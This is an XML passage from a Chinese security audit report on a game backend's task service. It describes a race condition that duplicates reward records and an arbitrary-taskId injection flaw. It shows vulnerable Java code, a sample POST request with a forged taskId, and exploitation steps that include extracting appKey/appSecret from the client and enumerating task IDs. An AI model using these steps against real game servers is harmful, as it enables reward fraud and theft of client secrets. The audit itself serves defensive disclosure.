        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用多线程/并发 HTTP 客户端（如 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">、curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>--parallel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">、JMeter）同时发出，使两条请求在服务端竞争同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndTaskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 查询窗口；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">查询数据库中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_task_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表，确认同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存在多条记录；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发任务完成/奖励发放逻辑，观察奖励是否被重复发放。</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p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">竞态窗口命中时，数据库中存在多条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 相同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若任务系统按记录条数或遍历所有匹配记录处理奖励，则奖励被多次发放。</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1030"/>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p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通注册用户（需有效 Bearer Token + 客户端 appKey/appSecret 签名）；攻击者无需任何特权权限，仅需一个正常玩家账号即可发起</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修复建议方向（仅供参考，不属于漏洞内容）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1032"/>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user_task_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(user_id, task_id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段上建立</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据库级唯一索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，利用数据库约束作为最终安全网，使重复 INSERT 直接抛异常；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">或在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndTaskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 改用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT … FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（悲观锁）以序列化同一 key 的并发访问。</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034"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TaskExecutionController.java.doTask → TaskExecutionService.java.doTask → UserTaskRecord.java.setUserId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audit_m222_884_doTask_ctrl-path2of7.md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：TaskExecutionService.java#doTask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_49" w:id="49"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞48：任意 taskId 注入——无任务合法性与用户资格校验</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="103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：任意任务记录创建（无 taskId 合法性校验与用户资格验证）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="103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src/main/java/com/gameBack/mjservice/service/TaskExecutionService.java:doTask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="103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：业务逻辑漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="103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3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：普通登录用户（需有效 Bearer Token + 签名凭据）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="104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TaskExecutionService.doTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 接收攻击者完全可控的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，在创建 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>未执行任何业务合法性校验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">未验证 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是否在任务配置表中实际存在；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>未验证任务是否处于启用/可参与状态；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>未验证当前用户是否满足该任务的前置条件（等级、VIP 等级、任务解锁序列等）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者可枚举任意 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（包括未发布的、VIP 专属的、有依赖前置的任务），强制为自身预创建 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 关联记录，从而：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>绕过任务解锁序列，跳过前置任务直接进入目标任务流程；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>为不存在的任务 ID 创建孤立记录，若下游奖励系统不严格校验任务存在性，可触发非预期奖励发放；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>探测并预埋尚未发布的任务记录，在任务上线时直接处于"已参与"状态获取竞争优势。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1047"/>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HTTP 请求体中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>form.getTaskId()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 属于攻击者完全可控字段，经 Controller 直传到 Service 层后，整个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>doTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法内未调用任何任务配置查询来验证 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 有效性，也未调用任何资格校验逻辑，直接以该值构建并持久化 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</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入口：TaskExecutionController.java</w:t>
              <w:br/>
              <w:t>// DoTaskForm 字段（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   Long taskId;  ← 攻击者完全可控，无任何客户端/服务端前置过滤</w:t>
              <w:br/>
              <w:t>@PostMapping("/doTask")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; doTask(@CurrentUserId Long userId, @RequestBody DoTaskForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    taskExecutionService.doTask(userId, form.getTaskId());  // ← taskId 污点直接传入 Service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层：TaskExecutionService.java</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void doTask(Long userId, Long taskId) {  // ← taskId 为攻击者可控值</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireSystemRunning();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireNotBanned(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ❌ 无任何任务存在性校验（未查 task 配置表）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ❌ 无任何用户资格校验（无前置任务检查、无等级/VIP 校验）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Optional&lt;UserTaskRecord&gt; byUserIdAndTaskId = userTaskRecordRepository.findByUserIdAndTaskId(userId, taskId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!byUserIdAndTaskId.isEmpty()) return;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserTaskRecord r = new UserTaskRecord();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setTaskId(taskId);  // ← 任意 taskId 被直接持久化，漏洞点</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setCurrentProgress(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setTargetProgress(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setStatus(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userTaskRecordRepository.save(r);  // ← 无效/越权 taskId 写入 DB</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/api/task/doTask HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者的合法 Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>appKey: &lt;提取自游戏客户端的 appKey&gt;</w:t>
              <w:br/>
              <w:t>timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>nonce: &lt;随机字符串&gt;</w:t>
              <w:br/>
              <w:t>sign: &lt;按 ParamSortSignUtils 规则计算的签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"taskId": 999999}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">逆向游戏客户端（APK/PC 包）提取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>appKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>appSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，或通过抓包获取正常请求的签名参数；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用合法账号登录获取有效 Bearer Token；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">通过枚举（从 1 到 N 遍历）或通过其他信息泄露接口获取目标任务的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（如管理接口返回的任务列表）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1051"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
